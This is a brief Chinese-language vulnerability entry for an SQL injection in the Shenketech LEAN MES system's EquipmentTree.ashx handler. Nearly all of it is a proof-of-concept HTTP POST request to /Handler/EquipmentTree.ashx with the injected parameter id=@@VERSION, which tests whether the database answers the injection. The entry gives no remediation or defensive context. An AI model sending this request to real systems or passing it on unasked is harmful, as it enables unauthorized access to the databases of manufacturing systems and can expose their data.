漏洞描述
深科特 LEAN MES系统 EquipmentTree.ashx SQL注入漏洞
深科特 LEAN MES系统 EquipmentTree.ashx SQL注入漏洞
PoC代码
POST /Handler/EquipmentTree.ashx HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 12
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.1307.119 Safari/537.36
id=@@VERSION